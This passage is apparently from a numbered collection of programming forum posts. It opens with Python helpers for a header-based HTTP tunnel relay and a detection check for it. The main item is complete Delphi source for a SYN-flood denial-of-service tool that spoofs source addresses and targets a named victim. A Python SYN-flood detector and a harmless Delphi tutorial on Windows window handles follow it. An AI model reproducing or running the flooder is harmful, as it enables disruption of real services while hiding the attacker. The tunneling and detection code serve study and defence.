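def decode_tunnel_headers(headers):
    """
    Remote PHP-file side: reassemble HTTP-Request-0, -1, ... in index order and
    decode. Returns None when no carrier headers are present (RProxy then
    redirects to google.com instead of relaying anything).
    """
    by_index = {}
    for name, value in headers:
        m = re.fullmatch(r"HTTP-Request-(\d+)", name, re.IGNORECASE)
        if m:
            by_index[int(m.group(1))] = value
    if 0 not in by_index:
        return None
    joined = ""
    i = 0
    while i in by_index:          # stop at the first gap, as the isset() loop does
        joined += by_index[i]
        i += 1
    return base64.b64decode(joined)

def rewrite_for_origin(client_request: bytes) -> bytes:
    """
    Apply the relay's header cleanup: drop Keep-Alive, Proxy-Connection and
    Connection, then force Connection: close right after the Host header.
    """
    text = client_request.decode("latin-1")
    text = re.sub(r"(?i)^(Keep-Alive|Proxy-Connection|Connection):[^\r\n]*\r\n", "", text, flags=re.M)
    text = re.sub(r"(?i)^(Host:[^\r\n]*\r\n)", r"\1Connection: close\r\n", text, count=1, flags=re.M)
    return text.encode("latin-1")

def inspect_request_headers(headers):
    """
    Defender's check for a web server or WAF: if the carrier headers are
    present, return the Host the tunneled request targets; otherwise None.
    """
    inner = decode_tunnel_headers(headers)
    if inner is None:
        return None
    m = re.search(rb"Host: +([^\t\r\n]+)", inner, re.IGNORECASE)
    return m.group(1).decode("latin-1") if m else "<no Host header>"

# Constructed sample client request, as a browser would send it to localhost:8888
SAMPLE_REQUEST = (b"GET /index.html HTTP/1.1\r\n"
                  b"Host: example.com\r\n"
                  b"User-Agent: test\r\n"
                  b"Proxy-Connection: keep-alive\r\n"
                  b"\r\n")

if __name__ == "__main__":
    carriers = encode_tunnel_headers(SAMPLE_REQUEST, header_max=40)
    print(len(carriers), "carrier headers")
    print("tunneled host:", inspect_request_headers(carriers))
    print(rewrite_for_origin(SAMPLE_REQUEST).decode("latin-1"))
```

On the hosting side, a request whose headers include `HTTP-Request-0` is the signal to log: the outer request looks like an ordinary GET of the script, so only the header names give the relay away, which is why a header-name check rather than a URL or body check is the right detection point.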
  24. program syn; {$APPTYPE CONSOLE} uses Windows, Winsock; const Banner = #13#10'syn v1.6 [14 Aug 2003]'#13#10#13#10 + 'http://www.loranbase.com'#13#10; type TPorts = array of Word; TSynOptions = packed record Delay: Cardinal; DstPorts: TPorts; SockAddr: TSockAddrIn; Num: Cardinal; RandomSeek: Integer; Sended: Cardinal; Socket: TSocket; SpoofIP: Cardinal; SrcPorts: TPorts; end; WordArray = ^TWordArray; TWordArray = array [0..0] of Word; PIPhdr = ^TIPhdr; TIPhdr = packed record ip_verlen: Byte; ip_tos: Byte; ip_len: Word; ip_id: Word; ip_off: Word; ip_ttl: Byte; ip_p: Byte; ip_sum: Word; ip_src: Cardinal; ip_dst: Cardinal; end; PTCPhdr = ^TTCPhdr; TTCPhdr = packed record tcp_src : Word; tcp_dst : Word; tcp_seq : Cardinal; tcp_ack : Cardinal; tcp_off : Byte; tcp_flags : Byte; tcp_win : Word; tcp_sum : Word; tcp_urp : Word; end; Ppseudohdr_tcp = ^Tpseudohdr_tcp; Tpseudohdr_tcp = packed record saddr : Cardinal; daddr : Cardinal; zero : Byte; protocol : Byte; length : Word; tcphdr : TTCPhdr; end; const Len = 40; var Buf: array [0..(Len - 1)] of Char; IPhdr: PIPhdr = @Buf[0]; TCPhdr: PTCPhdr = @Buf[20]; WSAData: TWSAData; i, j: integer; UseDelay: Boolean; SynOpt: TSynOptions; LastUpdate: Cardinal = 0; function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean; begin Result := Force or ((GetTickCount - LastUpdate) >= DelayValue); if Result then LastUpdate := GetTickCount; end; function StrtoInt(const S: string): integer; var E: integer; begin Val(S, Result, E); end; function InttoStr(const Value: integer): string; var S: string[11]; begin Str(Value, S); Result := S; end; function StrToIntDef(const S: string; Default: integer): integer; var E: integer; begin Val(S, Result, E); if E <> 0 then Result := Default; end; function ExtractFileName(const Path: string): string; var i, L: integer; Ch: Char; begin L := Length(Path); for i := L downto 1 do begin Ch := Path[i]; if (Ch = '\') or (Ch = '/') then begin Result := Copy(Path, i + 1, L - i); Break; end; 
end;
end;

function CheckSum(data: WordArray; size: Integer): Word;
var
  i, sum: Integer;
begin
  sum := 0;
  i := 0;
  while size > 1 do
  begin
    Inc(sum, data^[i]);
    Dec(size, 2);
    Inc(i);
  end;
  if size <> 0 then
    Inc(sum, data^[i]);
  sum := (sum shr 16) + (sum and $ffff);
  Inc(sum, sum shr 16);
  Result := not sum;
end;

function ValidPort(const Port: string): Boolean;
var
  prt: Integer;
begin
  prt := StrtoIntDef(Port, -1);
  Result := (prt > -1) and (prt < 65536); // a valid port must be between 0 and 65535
end;

function GetPorts(Ports: string): TPorts;
  procedure AddPort(const Port: string);
  begin
    if ValidPort(Port) then
    begin
      SetLength(Result, Length(Result) + 1);
      Result[High(Result)] := StrtoInt(Port);
    end
    else
      Writeln('Skipping invalid port: ' + Port);
  end;
var
  i: Integer;
  S: string;
begin
  i := Pos(',', Ports);
  while i > 0 do
  begin
    S := Copy(Ports, 1, i - 1);
    AddPort(S);
    Delete(Ports, 1, i);
    i := Pos(',', Ports);
  end;
  AddPort(Ports);
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                     // values between very short times
  SynOpt.RandomSeek := (SynOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor SynOpt.RandomSeek) mod Range;
end;

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host);   // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not an ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then     // if the host couldn't be resolved then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length);
  end;
  Result := InAddr.S_addr;
end;

procedure CreateSocket;
begin
  SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if SynOpt.Socket = INVALID_SOCKET then
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SynOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then
  begin // if the IP_HDRINCL option can't be set then exit
    Writeln('Error: IP_HDRINCL'#13#10 + '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

var
  SeudoBuf: array [0..31] of Char;

procedure SendSyn(const sport, dport: Word);
  procedure SendSyn_FillIPhdr;
  begin
    IPhdr.ip_verlen := $45;
    IPhdr.ip_tos := 0;
    IPhdr.ip_len := htons(Len);
    IPhdr.ip_id := GetRandomValue(High(Word)) + 1;
    IPhdr.ip_ttl := 255;
    IPhdr.ip_p := 6; // 6 = TCP
    if SynOpt.SpoofIP = 0 then
      IPhdr.ip_src := GetRandomIP
    else
      IPhdr.ip_src := SynOpt.SpoofIP;
    IPhdr.ip_dst := SynOpt.SockAddr.sin_addr.S_addr;
    IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  end;

  procedure SendSyn_FillTCPhdr;
  var
    PSeudohdr: Ppseudohdr_tcp;
  begin
    if sport = 0 then
      TCPhdr.tcp_src := GetRandomValue(High(Word)) + 1
    else
      TCPhdr.tcp_src := htons(sport);
    if dport = 0 then
      TCPhdr.tcp_dst := GetRandomValue(High(Word)) + 1
    else
      TCPhdr.tcp_dst := htons(dport);
    TCPhdr.tcp_seq := GetRandomValue(High(Integer)) + 1;
    TCPhdr.tcp_ack := GetRandomValue(High(Integer)) + 1;
    TCPhdr.tcp_flags := $02; // 0x02 = syn flag
    TCPhdr.tcp_win := GetRandomValue(High(Word)) + 1;
    TCPhdr.tcp_urp := GetRandomValue(High(Word)) + 1;
    FillChar(SeudoBuf, Sizeof(SeudoBuf), 0);
    PSeudohdr := Ppseudohdr_tcp(@SeudoBuf); // for a correct tcp checksum
    PSeudohdr.saddr := IPhdr.ip_src;         // we must calculate it with a pseudo header
    PSeudohdr.daddr := IPhdr.ip_dst;
    PSeudohdr.protocol := 6;
    PSeudohdr.length := htons(20);
    PSeudohdr.tcphdr := TCPhdr^;
    TCPhdr.tcp_sum := CheckSum(@PSeudohdr^, 32);
  end;
begin
  FillChar(Buf, Len, 0);
  SendSyn_FillIPhdr;
  SendSyn_FillTCPhdr;
  Sendto(SynOpt.Socket, Buf, Len, 0, SynOpt.SockAddr, Sizeof(SynOpt.SockAddr));
end;

procedure SetDefaultOptions;
begin
  SynOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SetLength(SynOpt.DstPorts, 1);
  SynOpt.DstPorts[0] := 0;
  SynOpt.SockAddr.sin_family := AF_INET;
  SynOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1;
  SetLength(SynOpt.SrcPorts, 1);
  SynOpt.SrcPorts[0] := 0;
end;

procedure SetParams;
var
  i, pcount: Integer;
  pstr: string;
  Ch: Char;
begin
  pcount := ParamCount;
  for i := 2 to pcount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    if Ch = #0 then
      Continue;
    case Ch of
      'S': SynOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1)));
      'p':
        begin
          SynOpt.DstPorts := GetPorts(ParamStr(i + 1));
          if Length(SynOpt.DstPorts) = 0 then
          begin
            Writeln('No valid ports found on the dst port list');
            Halt(0);
          end;
        end;
      's':
        begin
          SynOpt.SrcPorts := GetPorts(ParamStr(i + 1));
          if Length(SynOpt.SrcPorts) = 0 then
          begin
            Writeln('No valid ports found on the src port list');
            Halt(0);
          end;
        end;
      'n': SynOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': SynOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
    'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
    'Options:'#13#10 +
    ' -S: Spoof host (0 is random (default))'#13#10 +
    ' -p: Comma separated list of dest ports (0 is random (default))'#13#10 +
    ' -s: Comma separated list of src ports (0 is random (default))'#13#10 +
    ' -n: Num of packets (0 is continuous (default))'#13#10 +
    ' -d: Delay (in ms) (default 0)'#13#10
  );
  Halt(0);
end;

begin
  Writeln(Banner);
  if ParamCount < 1 then
    Usage(ExtractFileName(ParamStr(0)));
  WSAStartUp($0101, WSAData);
  FillChar(SynOpt, Sizeof(SynOpt), 0);
  CreateSocket;
  try
    Randomize;
    SetDefaultOptions;
    if ParamCount > 1 then
      SetParams;
    UseDelay := SynOpt.Delay > 0;
    repeat
      for i := 0 to High(SynOpt.DstPorts) do
      begin
        for j := 0 to High(SynOpt.SrcPorts) do
        begin
          SendSyn(SynOpt.SrcPorts[j], SynOpt.DstPorts[i]);
          if UseDelay then
            Sleep(SynOpt.Delay);
        end;
      end;
      Inc(SynOpt.Sended);
      if CanUpdate(50, SynOpt.Sended = SynOpt.Num) then
        SetConsoleTitle(PChar('Count: ' + InttoStr(SynOpt.Sended)));
    until SynOpt.Sended = SynOpt.Num;
  finally
    CloseSocket(SynOpt.Socket);
    WSACleanUp;
  end;
end.
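Added example, not part of the post above and not the tool's own code: a small detector for the traffic shape this program emits (SYN-only segments to one destination from many spoofed sources, never followed by the handshake-completing ACK), run over constructed flow records. The record layout (timestamp, source, destination, TCP flag letters) is an assumption for the example.

```python
from collections import defaultdict

# Constructed flow records (not captured traffic):
# (timestamp_s, src_ip, src_port, dst_ip, dst_port, tcp_flags)
SAMPLE = [
    # three legitimate clients: SYN followed by the handshake-completing ACK
    (0.00, "203.0.113.7", 51514, "192.0.2.10", 443, "S"),
    (0.05, "203.0.113.7", 51514, "192.0.2.10", 443, "A"),
    (0.10, "203.0.113.8", 51600, "192.0.2.10", 443, "S"),
    (0.15, "203.0.113.8", 51600, "192.0.2.10", 443, "A"),
    (0.20, "203.0.113.9", 51700, "192.0.2.10", 80, "S"),
    (0.25, "203.0.113.9", 51700, "192.0.2.10", 80, "A"),
]
# thirty bare SYNs to port 80 from thirty different sources within one second:
# the shape the flooder's random-source, random-port default produces
SAMPLE += [(0.30 + i * 0.02, f"198.51.100.{i + 1}", 40000 + i, "192.0.2.10", 80, "S")
           for i in range(30)]


def syn_flood_suspects(records, window=1.0, min_syn=20):
    """Return {(dst_ip, dst_port): (half_open, distinct_sources)} for every
    destination that, within one `window`-second bucket, receives at least
    `min_syn` SYN-only segments whose sources never complete the handshake.
    A fixed spoofed source (the tool's -S option) still trips the count;
    distinct_sources then stays at 1, which is itself a useful signal."""
    half_open = defaultdict(set)   # (bucket, dst) -> {(src_ip, src_port)}
    completed = set()              # (src_ip, src_port, dst) that later sent an ACK
    for ts, sip, sport, dip, dport, flags in records:
        dst = (dip, dport)
        if flags == "S":
            half_open[(int(ts // window), dst)].add((sip, sport))
        elif "A" in flags:
            completed.add((sip, sport, dst))
    suspects = {}
    for (_, dst), sources in half_open.items():
        pending = {s for s in sources if (s[0], s[1], dst) not in completed}
        if len(pending) >= min_syn:
            stats = (len(pending), len({ip for ip, _ in pending}))
            if stats > suspects.get(dst, (0, 0)):
                suspects[dst] = stats
    return suspects


if __name__ == "__main__":
    for dst, (pending, sources) in syn_flood_suspects(SAMPLE).items():
        print(f"{dst[0]}:{dst[1]} -> {pending} half-open SYNs from {sources} sources")
```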
  25. Author: bubzuru

An important concept in Windows programming is the concept of an object handle. Many functions return a handle to an object that the function created or loaded from a resource. Internally, Windows keeps track of all of these handles, and the handle serves as the link through the operating system between the object and the application. There are several ways to obtain the handle of a window.

I) FindWindow

Syntax:

  FindWindow(lpClassName: PChar;  {a pointer to a null-terminated class name string}
             lpWindowName: PChar  {a pointer to a null-terminated window name string}
            ): HWND;              {returns a handle to a window}

The FindWindow function retrieves the handle to the top-level window whose class name and window name match the specified strings. This function does not search child windows. If the function succeeds, the return value is the handle to the window that has the specified class name and window name. If the function fails, the return value is 0.

Examples:

Get the handle of Notepad by its class name:

  procedure TForm1.Button1Click(Sender: TObject);
  var
    hNotepadWindow: HWND;
  begin
    hNotepadWindow := FindWindow('notepad', nil);
  end;

Get the handle of Winword by its class name and hide it/show it after 2 sec.:

  procedure TForm1.Button1Click(Sender: TObject);
  var
    hWordWindow: HWND;
  begin
    hWordWindow := FindWindow('OpusApp', nil);
    ShowWindow(hWordWindow, SW_HIDE);
    Sleep(2000);
    ShowWindow(hWordWindow, SW_SHOW);
  end;

Get the handle of Internet Explorer and minimize/close all its windows:

  procedure TForm1.Button1Click(Sender: TObject);
  var
    hIExplorer: HWND;
  begin
    hIExplorer := FindWindow('IEFrame', nil);
    if hIExplorer <> 0 then
    begin
      // Minimize IE:
      SendMessage(hIExplorer, WM_SYSCOMMAND, SC_MINIMIZE, 0);
      // Close IE:
      SendMessage(hIExplorer, WM_SYSCOMMAND, SC_CLOSE, 0);
    end;
  end;

II) GetWindow

FindWindowByTitle returns the handle of a window that contains a certain "WindowTitle".

  function FindWindowByTitle(WindowTitle: string): HWND;
  var
    NextHandle: HWND;
    NextTitle: array[0..260] of Char;
  begin
    // Get the first window
    NextHandle := GetWindow(Application.Handle, GW_HWNDFIRST);
    while NextHandle > 0 do
    begin
      // Retrieve its text
      GetWindowText(NextHandle, NextTitle, 255);
      if Pos(WindowTitle, StrPas(NextTitle)) <> 0 then
      begin
        Result := NextHandle;
        Exit;
      end
      else
        // Get the next window
        NextHandle := GetWindow(NextHandle, GW_HWNDNEXT);
    end;
    Result := 0;
  end;

Example of how to search for a window that contains the word "notepad" and maximize it:

  procedure TForm1.Button1Click(Sender: TObject);
  var
    h: HWND;
  begin
    h := FindWindowByTitle('notepad');
    if h <> 0 then // if we found notepad
      ShowWindow(h, SW_MAXIMIZE)
    else
      ShowMessage('not found.');
  end;

III) FindWindowEx

Syntax:

  FindWindowEx(Parent: HWND;      {a handle to a parent window}
               Child: HWND;       {a handle to a child window}
               ClassName: PChar;  {a pointer to a null-terminated class name string}
               WindowName: PChar  {a pointer to a null-terminated window name string}
              ): HWND;            {returns a handle to a window}

Description: FindWindowEx retrieves the handle of the window with the specified class name and window name. Unlike FindWindow, this function searches child windows, starting with the one following the given child window.

Example to find a TButton (child window) on a TForm:

  procedure TForm1.Button1Click(Sender: TObject);
  var
    FoundWindow: HWND;
    WindowText: array[0..255] of Char;
  begin
    {Find a TButton child window}
    FoundWindow := FindWindowEx(Form1.Handle, 0, 'TButton', nil);
    {Get its text}
    GetWindowText(FoundWindow, WindowText, 255);
    {Display it}
    Label1.Caption := 'FindWindowEx found window handle ' + IntToStr(FoundWindow) + ': ' + WindowText;
  end;

Example to search for edit field nr. x in another application and send a text to it:

  function FindControlByNumber(hApp: HWND; ControlClassName: string; ControlNr: Word = 1): HWND;
  var
    i: Word;
    hControl: HWND;
  begin
    hControl := 0;
    if IsWindow(hApp) then
    begin
      Dec(ControlNr);
      // Each FindWindowEx call continues after the previously found child,
      // so the loop walks to the ControlNr-th control of that class
      for i := 0 to ControlNr do
      begin
        hControl := FindWindowEx(hApp, hControl, PChar(ControlClassName), nil);
        if hControl = 0 then
          Break;
      end;
    end;
    Result := hControl;
  end;

  procedure SetEditText(hApp: HWND; EditClassName, AText: string; EditNr: Integer);
  var
    hEdit: HWND;
  begin
    // Search for the EditNr-th control of class EditClassName in the application
    hEdit := FindControlByNumber(hApp, EditClassName, EditNr);
    if hEdit <> 0 then
      // Send the text to the edit field
      SendMessage(hEdit, WM_SETTEXT, 0, Integer(PChar(AText)));
  end;

  // Test: send a "Hello" to the 2nd edit field of an application
  // SetEditText(FindWindow('Write_Here_Class_Of_App', nil), 'Edit', 'Hello', 2);

IV) EnumWindows

Syntax:

  EnumWindows(lpEnumFunc: TFNWndEnumProc;  {the address of the enumeration callback function}
              lParam: LPARAM               {a 32-bit application-defined value}
             ): BOOL;                      {returns TRUE or FALSE}

The EnumWindows function enumerates all top-level windows on the screen by passing the handle of each window, in turn, to an application-defined callback function. EnumWindows continues until the last top-level window is enumerated or the callback function returns FALSE.

Callback syntax:

  EnumWindowsProc(hWnd: HWND;     {a handle to a top-level window}
                  lParam: LPARAM  {the application-defined data}
                 ): BOOL;         {returns TRUE or FALSE}

Example of how to list all top-level windows in a listbox:

  function EnumWindowsProc(wHandle: HWND; lb: TListBox): Bool; stdcall; export;
  var
    Title, ClassName: array[0..255] of Char;
  begin
    Result := True;
    GetWindowText(wHandle, Title, 255);
    GetClassName(wHandle, ClassName, 255);
    if IsWindowVisible(wHandle) then
      lb.Items.Add(string(Title) + '-' + string(ClassName));
  end;

  procedure TForm1.Button1Click(Sender: TObject);
  begin
    EnumWindows(@EnumWindowsProc, Integer(ListBox1));
  end;

V) EnumChildWindows

Syntax:

  EnumChildWindows(hWndParent: HWND;            {a handle to the parent window}
                   lpEnumFunc: TFNWndEnumProc;  {the address of the enumeration callback function}
                   lParam: LPARAM               {a 32-bit application-defined value}
                  ): BOOL;                      {returns TRUE or FALSE}

Description: The EnumChildWindows function enumerates the child windows that belong to the specified parent window by passing the handle of each child window, in turn, to an application-defined callback function. EnumChildWindows continues until the last child window is enumerated or the callback function returns False.

Here is an example that lists the controls on a TPrintDialog:

  function EnumProc(wnd: HWND; Lines: TStrings): BOOL; stdcall;
  var
    buf, Caption: array[0..255] of Char;
  begin
    Result := True;
    GetClassName(wnd, buf, SizeOf(buf) - 1);
    SendMessage(wnd, WM_GETTEXT, 256, Integer(@Caption));
    Lines.Add(Format('ID: %d, ClassName: %s, Caption: %s', [GetDlgCtrlID(wnd), buf, Caption]));
  end;

  procedure TForm1.PrintDialog1Show(Sender: TObject);
  begin
    Memo1.Clear;
    EnumChildWindows(PrintDialog1.Handle, @EnumProc, Integer(Memo1.Lines));
  end;

VI) EnumThreadWindows

Syntax:

  EnumThreadWindows(dwThreadId: DWORD;        {the thread identification number}
                    lpfn: TFNWndEnumProc;     {the address of the enumeration callback function}
                    lParam: LPARAM            {a 32-bit application-defined value}
                   ): BOOL;                   {returns TRUE or FALSE}

Description: This function enumerates all of the nonchild windows associated with the specified thread. Each window handle associated with the specified thread is passed to an application-defined callback function. This function will continue until all of the windows are enumerated or the callback function returns False.

Syntax of the callback function:

  EnumThreadWndProc(hWnd: HWND;     {a handle to a window}
                    lParam: LPARAM  {the application-defined data}
                   ): BOOL;

  // The callback must use the stdcall convention, as the API expects
  function EnumerateThreadWindows(Wnd: HWND; Data: LPARAM): BOOL; stdcall;
  var
    WindowText: array[0..255] of Char; // holds the text of the window
  begin
    { Get the text from the window }
    GetWindowText(Wnd, WindowText, 255);
    { Display it in the listbox }
    Form1.ListBox1.Items.Add(WindowText);
    { Continue the enumeration }
    Result := True;
  end;

  procedure TForm1.Button1Click(Sender: TObject);
  begin
    { Clear the listbox }
    ListBox1.Items.Clear;
    { Enumerate all windows that belong to the current thread }
    EnumThreadWindows(GetCurrentThreadID, @EnumerateThreadWindows, 0);
  end;